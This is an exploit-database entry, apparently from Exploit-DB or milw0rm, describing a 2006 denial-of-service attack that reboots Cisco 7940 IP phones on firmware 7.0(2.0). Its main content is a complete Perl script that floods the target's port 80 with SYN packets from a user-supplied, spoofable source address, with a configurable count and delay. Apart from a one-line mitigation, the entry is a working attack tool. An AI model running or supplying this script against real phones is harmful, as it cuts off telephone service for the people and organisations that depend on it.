Trashing Cisco 7940 IP Phones

vendor:

7940 IP Phones

by:

milw0rm.com

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: 7940 IP Phones

Affected Version From: 7.0(2.0)

Affected Version To: 7.0(2.0)

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2006

Trashing Cisco 7940 IP Phones

A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes Cisco 7940 IP phones reboot.

Mitigation:

Disable the port 80 on the Cisco 7940 IP phones.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my 
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.

use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
        ip => {
                saddr => $ARGV[0],
                daddr => $ARGV[1] 
                },
        tcp=> { dest => $ARGV[2],
                syn => 1,
                seq => 0,
                ack => 0}
        });
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };

# milw0rm.com [2006-01-10]